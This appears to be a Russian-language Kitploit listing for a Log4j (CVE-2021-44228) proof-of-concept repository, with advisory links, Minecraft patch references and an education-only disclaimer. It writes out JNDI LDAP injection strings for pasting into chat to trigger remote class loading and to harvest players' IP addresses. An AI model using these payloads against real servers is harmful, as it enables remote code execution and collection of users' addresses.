Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Log4J-RCE-Proof-Of-Concept — Log4j-RCE (CVE-2021-44228) Proof of Concept с дополнительной информацией | Kitploit
Инструменты/GitHubGitHub/hycrafthd/log4j-rce-proof-of-concept
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubhycrafthd/log4j-rce-proof-of-concept

Log4J-RCE-Proof-Of-Concept

Log4j-RCE (CVE-2021-44228) Proof of Concept с дополнительной информацией

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
РепозиторийСайт
182314 лет назадПроверено Kitploit

Log4J-RCE-Proof-Of-Concept (CVE-2021-44228)

Это proof of concept эксплуатации уязвимости log4j rce.

Вот несколько ссылок по CVE-2021-44228:

  • https://www.lunasec.io/docs/blog/log4j-zero-day
  • https://github.com/advisories/GHSA-jfh8-c2jp-5v3q
  • https://github.com/apache/logging-log4j2/pull/608
  • https://www.youtube.com/watch?v=JPGola6BamU

Эта ошибка затрагивает почти все версии log4j2 и, возможно, log4j1. Рекомендуемая версия для использования — 2.15.0, которая устраняет эксплуатацию.

Демонстрация с minecraft (который использует log4j2)

  • Подробности о влиянии на minecraft перечислены здесь: https://twitter.com/slicedlime/status/1469150993527017483
  • Статья от minecraft здесь: https://www.minecraft.net/en-us/article/important-message--security-vulnerability-java-edition
  • Исправленные версии minecraft forge: https://twitter.com/gigaherz/status/1469331288368861195
  • Подробная статья от minecraft forge: https://gist.github.com/TheCurle/f15a6b63ceee3be58bff5e7a97c3a4e6
  • Исправленные версии minecraft fabric: https://twitter.com/slicedlime/status/1469192689904193537
  • Исправленные версии minecraft paper: https://twitter.com/aurora_smiles_/status/1469205803232026625
  • Исправленные версии minecraft spigot: https://www.spigotmc.org/threads/spigot-security-releases-%E2%80%94-1-8-8%E2%80%931-18.537204/
  • Исправленные версии minecraft sponge: https://discord.com/channels/142425412096491520/303772747907989504/918744598065586196

Задержка или отправка сериализованных данных

  • Вставьте ${jndi:ldap://127.0.0.1/e} в чат. Если на порту 389 есть открытый сокет, log4j пытается подключиться и блокирует дальнейшее общение до наступления таймаута.
  • При использовании этого proof of concept эксплойта в логе консоли будет записано THIS IS SEND TO THE LOG!!! LOG4J EXPLOIT!, что представляет собой сериализованный строковый объект от ldap-сервера.

image

  • Кроме того, вредоносный ldap-сервер получает каждый IP-адрес, где было залогировано сообщение. Это означает, что с помощью этого эксплойта можно собирать IP-адреса игроков на сервере.

RCE

  • Вставьте ${jndi:ldap://127.0.0.1/exe} в чат. Если -Dcom.sun.jndi.ldap.object.trustURLCodebase=true установлен в true, произойдёт удалённое выполнение кода.

image

  • К счастью, современные jdk отключают удалённую загрузку классов по умолчанию. (https://www.oracle.com/java/technologies/javase/8u121-relnotes.html)
  • Старые версии всё ещё могут допускать это!!

Отказ от ответственности

Этот проект предназначен только для образовательных целей.

Скачать инструмент